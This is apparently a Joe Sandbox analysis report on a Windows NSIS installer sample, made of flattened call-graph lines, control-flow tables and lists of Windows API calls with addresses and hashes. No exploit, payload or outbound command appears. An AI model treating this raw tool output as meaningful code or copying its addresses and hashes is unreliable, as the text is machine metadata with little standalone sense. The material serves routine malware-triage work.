4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                    • EmptyClipboard.USER32 ref: 00405411
                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                    • CloseClipboard.USER32 ref: 0040546E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                    • API String ID: 2110491804-2409696222
                                                    • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                    • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                    APIs
                                                    • #17.COMCTL32 ref: 004038A2
                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                    • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
